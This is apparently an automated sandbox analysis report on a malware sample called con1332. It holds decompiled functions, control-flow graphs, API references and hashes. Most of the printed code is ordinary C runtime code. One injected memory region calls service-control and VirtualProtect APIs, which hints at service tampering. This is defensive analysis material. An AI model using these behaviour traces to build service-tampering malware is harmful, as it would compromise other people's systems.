                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3322701435-0
                                                                                                                                                                                                                                    • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                    • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 249 40af66-40af6e 250 40af7d-40af88 call 40b84d 249->250 253 40af70-40af7b call 40d2e3 250->253 254 40af8a-40af8b 250->254 253->250 257 40af8c-40af98 253->257 258 40afb3-40afca call 40af49 call 40cd39 257->258 259 40af9a-40afb2 call 40aefc call 40d2bd 257->259 259->258
                                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                                    			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

















                                                                                                                                                                                                                                    0x0040af66
                                                                                                                                                                                                                                    0x0040af66
                                                                                                                                                                                                                                    0x0040af69
                                                                                                                                                                                                                                    0x0040af7d
                                                                                                                                                                                                                                    0x0040af80
                                                                                                                                                                                                                                    0x0040af88
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040af73
                                                                                                                                                                                                                                    0x0040af79
                                                                                                                                                                                                                                    0x0040af7b
                                                                                                                                                                                                                                    0x0040af8c
                                                                                                                                                                                                                                    0x0040af98
                                                                                                                                                                                                                                    0x0040af9a
                                                                                                                                                                                                                                    0x0040af9a
                                                                                                                                                                                                                                    0x0040afa3
                                                                                                                                                                                                                                    0x0040afad
                                                                                                                                                                                                                                    0x0040afb2
                                                                                                                                                                                                                                    0x0040afb7
                                                                                                                                                                                                                                    0x0040afc5
                                                                                                                                                                                                                                    0x0040afca
                                                                                                                                                                                                                                    0x0040afd0
                                                                                                                                                                                                                                    0x0040aec2
                                                                                                                                                                                                                                    0x0040b6b5
                                                                                                                                                                                                                                    0x0040b6b7
                                                                                                                                                                                                                                    0x0040b6bc
                                                                                                                                                                                                                                    0x0040b6c1
                                                                                                                                                                                                                                    0x0040b6c4
                                                                                                                                                                                                                                    0x0040b6c6
                                                                                                                                                                                                                                    0x0040b6c8
                                                                                                                                                                                                                                    0x0040b6cf
                                                                                                                                                                                                                                    0x0040b714
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040b6d1
                                                                                                                                                                                                                                    0x0040b6d3
                                                                                                                                                                                                                                    0x0040b6d9
                                                                                                                                                                                                                                    0x0040b6de
                                                                                                                                                                                                                                    0x0040b6e4
                                                                                                                                                                                                                                    0x0040b6e7
                                                                                                                                                                                                                                    0x0040b6e9
                                                                                                                                                                                                                                    0x0040b6eb
                                                                                                                                                                                                                                    0x0040b6ec
                                                                                                                                                                                                                                    0x0040b6ed
                                                                                                                                                                                                                                    0x0040b6f3
                                                                                                                                                                                                                                    0x0040b6f4
                                                                                                                                                                                                                                    0x0040b6fb
                                                                                                                                                                                                                                    0x0040b700
                                                                                                                                                                                                                                    0x0040b704
                                                                                                                                                                                                                                    0x0040b706
                                                                                                                                                                                                                                    0x0040b715
                                                                                                                                                                                                                                    0x0040b723
                                                                                                                                                                                                                                    0x0040b725
                                                                                                                                                                                                                                    0x0040b727
                                                                                                                                                                                                                                    0x0040b73a
                                                                                                                                                                                                                                    0x0040b73c
                                                                                                                                                                                                                                    0x0040b725
                                                                                                                                                                                                                                    0x0040b704
                                                                                                                                                                                                                                    0x0040b6cf
                                                                                                                                                                                                                                    0x0040b742
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040af7b
                                                                                                                                                                                                                                    0x0040af8b
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                                                                                      • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1411284514-0
                                                                                                                                                                                                                                    • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                                                                    • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BF0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 285 2bf0e0f-2bf0e24 SetErrorMode * 2 286 2bf0e2b-2bf0e2c 285->286 287 2bf0e26 285->287 287->286
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,02BF0223,?,?), ref: 02BF0E19
                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,02BF0223,?,?), ref: 02BF0E1E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                    • Instruction ID: 493a6c6bdc8abdcb9cbbc839ae6066722017b708e17f1d27ef97698133936497
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64D01231545128B7D7403A94DC09BCD7B1CDF09B66F008451FB0DD9481C770954046E5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 288 40e7ee-40e7f6 call 40e7c3 290 40e7fb-40e7ff ExitProcess 288->290
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}



                                                                                                                                                                                                                                    0x0040e7f6
                                                                                                                                                                                                                                    0x0040e7ff

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                                                                                                      • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                                                                                                      • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                                                                                                      • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2427264223-0
                                                                                                                                                                                                                                    • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                                                    • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046BA1A8 Relevance: 1.8, APIs: 1, Instructions: 299COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 291 46ba1a8-46ba232 293 46ba26b-46ba28d 291->293 294 46ba234-46ba23e 291->294 301 46ba2c9-46ba2ea 293->301 302 46ba28f-46ba29c 293->302 294->293 295 46ba240-46ba242 294->295 296 46ba265-46ba268 295->296 297 46ba244-46ba24e 295->297 296->293 299 46ba252-46ba261 297->299 300 46ba250 297->300 299->299 303 46ba263 299->303 300->299 308 46ba2ec-46ba2f6 301->308 309 46ba323-46ba345 301->309 302->301 304 46ba29e-46ba2a0 302->304 303->296 306 46ba2c3-46ba2c6 304->306 307 46ba2a2-46ba2ac 304->307 306->301 310 46ba2ae 307->310 311 46ba2b0-46ba2bf 307->311 308->309 312 46ba2f8-46ba2fa 308->312 319 46ba381-46ba3a2 309->319 320 46ba347-46ba354 309->320 310->311 311->311 313 46ba2c1 311->313 314 46ba31d-46ba320 312->314 315 46ba2fc-46ba306 312->315 313->306 314->309 317 46ba30a-46ba319 315->317 318 46ba308 315->318 317->317 321 46ba31b 317->321 318->317 328 46ba3db-46ba3fd 319->328 329 46ba3a4-46ba3ae 319->329 320->319 322 46ba356-46ba358 320->322 321->314 323 46ba37b-46ba37e 322->323 324 46ba35a-46ba364 322->324 323->319 326 46ba368-46ba377 324->326 327 46ba366 324->327 326->326 330 46ba379 326->330 327->326 335 46ba439-46ba4b0 ChangeServiceConfigA 328->335 336 46ba3ff-46ba40c 328->336 329->328 331 46ba3b0-46ba3b2 329->331 330->323 333 46ba3d5-46ba3d8 331->333 334 46ba3b4-46ba3be 331->334 333->328 337 46ba3c2-46ba3d1 334->337 338 46ba3c0 334->338 346 46ba4b9-46ba4f8 335->346 347 46ba4b2-46ba4b8 335->347 336->335 339 46ba40e-46ba410 336->339 337->337 340 46ba3d3 337->340 338->337 341 46ba433-46ba436 339->341 342 46ba412-46ba41c 339->342 340->333 341->335 344 46ba41e 342->344 345 46ba420-46ba42f 342->345 344->345 345->345 349 46ba431 345->349 350 46ba4fa-46ba4fe 346->350 351 46ba508-46ba50c 346->351 347->346 349->341 350->351 353 46ba500 350->353 354 46ba50e-46ba512 351->354 355 46ba51c-46ba520 351->355 353->351 354->355 356 46ba514 354->356 357 46ba522-46ba526 355->357 358 46ba530-46ba534 355->358 356->355 357->358 359 46ba528 357->359 360 46ba536-46ba53a 358->360 361 46ba544-46ba548 358->361 359->358 360->361 364 46ba53c 360->364 362 46ba54a-46ba54e 361->362 363 46ba558-46ba55c 361->363 362->363 365 46ba550 362->365 366 46ba55e-46ba562 363->366 367 46ba56c 363->367 364->361 365->363 366->367 368 46ba564 366->368 368->367
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 046BA4A0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeConfigService
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3849694230-0
                                                                                                                                                                                                                                    • Opcode ID: 4b9ef7a1522bb4a26c328f085fbdaa7197e8f3c39a593616f4bb00f44fd82c19
                                                                                                                                                                                                                                    • Instruction ID: df60bd62f6690b94dc97205882bc4780b59357463df339872004635b79d96dcc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b9ef7a1522bb4a26c328f085fbdaa7197e8f3c39a593616f4bb00f44fd82c19
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68C14A71D107199FDB10CFA8C9857EEBBF2BB44314F148629E895E7384EB74A981CB81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046B99E8 Relevance: 1.6, APIs: 1, Instructions: 92serviceCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 369 46b99e8-46b9a49 371 46b9a4b-46b9a55 369->371 372 46b9a82-46b9ad2 OpenServiceA 369->372 371->372 373 46b9a57-46b9a59 371->373 377 46b9adb-46b9b0c 372->377 378 46b9ad4-46b9ada 372->378 374 46b9a5b-46b9a65 373->374 375 46b9a7c-46b9a7f 373->375 379 46b9a69-46b9a78 374->379 380 46b9a67 374->380 375->372 384 46b9b0e-46b9b12 377->384 385 46b9b1c 377->385 378->377 379->379 382 46b9a7a 379->382 380->379 382->375 384->385 386 46b9b14 384->386 386->385
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenServiceA.ADVAPI32(?,?,?), ref: 046B9AC2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenService
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3098006287-0
                                                                                                                                                                                                                                    • Opcode ID: f6b8f9c21856c4d7b3361802341968c8e8679c1b09885d979a09c829a4ee469c
                                                                                                                                                                                                                                    • Instruction ID: ecbe97bec7b968c3fbfcb67ee730797789e4c7b9240c187e97cb5663bf41a15e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6b8f9c21856c4d7b3361802341968c8e8679c1b09885d979a09c829a4ee469c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F3168B1D002589FDB10CFA9C984BDEBBF1BF48304F148529E855AB340E774A889CF91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046B9920 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 387 46b9920-46b996f 389 46b9971-46b9974 387->389 390 46b9977-46b997b 387->390 389->390 391 46b997d-46b9980 390->391 392 46b9983-46b99b2 OpenSCManagerW 390->392 391->392 393 46b99bb-46b99cf 392->393 394 46b99b4-46b99ba 392->394 394->393
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 046B99A5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1889721586-0
                                                                                                                                                                                                                                    • Opcode ID: d47bd990afc756254357d2d3e98edec3613c81499ff67100d341e193dafede65
                                                                                                                                                                                                                                    • Instruction ID: 6e1d92918ca5aaa47717cf867b4808476ccbe78f8ea57eabe4cf87a29a94a21a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d47bd990afc756254357d2d3e98edec3613c81499ff67100d341e193dafede65
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A82135B6C002088FCB50CFAAD884BDEFBF4EF88314F14811AD908AB344D774A944CBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046B9180 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 396 46b9180-46b9201 VirtualProtect 399 46b920a-46b922f 396->399 400 46b9203-46b9209 396->400 400->399
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 046B91F4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                    • Opcode ID: ede9ce074f0e8b497325f4f8ed31ba780efd80c13269aa10c299732549b123e4
                                                                                                                                                                                                                                    • Instruction ID: b7ec714e46f13e90f19e33f9887ace432b172190cd4eed3d8014a9c177c2ae31
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ede9ce074f0e8b497325f4f8ed31ba780efd80c13269aa10c299732549b123e4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE1124B5D002098BDB10CFAAC884ADFFBF5AF48314F14842AD469A7250D779A945CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046BA0E8 Relevance: 1.6, APIs: 1, Instructions: 54serviceCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 404 46ba0e8-46ba165 ControlService 406 46ba16e-46ba18f 404->406 407 46ba167-46ba16d 404->407 407->406
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ControlService.ADVAPI32(?,?,?), ref: 046BA158
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ControlService
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 253159669-0
                                                                                                                                                                                                                                    • Opcode ID: d81489e17905cb3c6c6bb92e8316ef515a3c317a2de0a738fb60c5e3742300a5
                                                                                                                                                                                                                                    • Instruction ID: b47bc5d9b3e6edb5c66466b4579949b86403aac9671b77972b2e972c6eb18df6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d81489e17905cb3c6c6bb92e8316ef515a3c317a2de0a738fb60c5e3742300a5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A11E4B59002099FDB10CF9AD984BDEFBF4EB48314F10842AE558A7350D378A945CFA5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046B9350 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 409 46b9350-46b93bf FindCloseChangeNotification 412 46b93c8-46b93ed 409->412 413 46b93c1-46b93c7 409->413 413->412
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE ref: 046B93B2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                                                    • Opcode ID: 1ad8ac91917bed7f2efdfc17365027703f5931f0d2af332ceb92490002e56522
                                                                                                                                                                                                                                    • Instruction ID: b9be13994dd897bddf577f68a8211ce85fafc61c1b44909819c7c9649773234e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad8ac91917bed7f2efdfc17365027703f5931f0d2af332ceb92490002e56522
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B1158B59003088BDB10CFAAC8447DFBBF5AF88314F148419C459A7250C779A944CBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046B9CC8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 417 46b9cc8-46b9d34 FindCloseChangeNotification 419 46b9d3d-46b9d5e 417->419 420 46b9d36-46b9d3c 417->420 420->419
                                                                                                                                                                                                                                    APIs
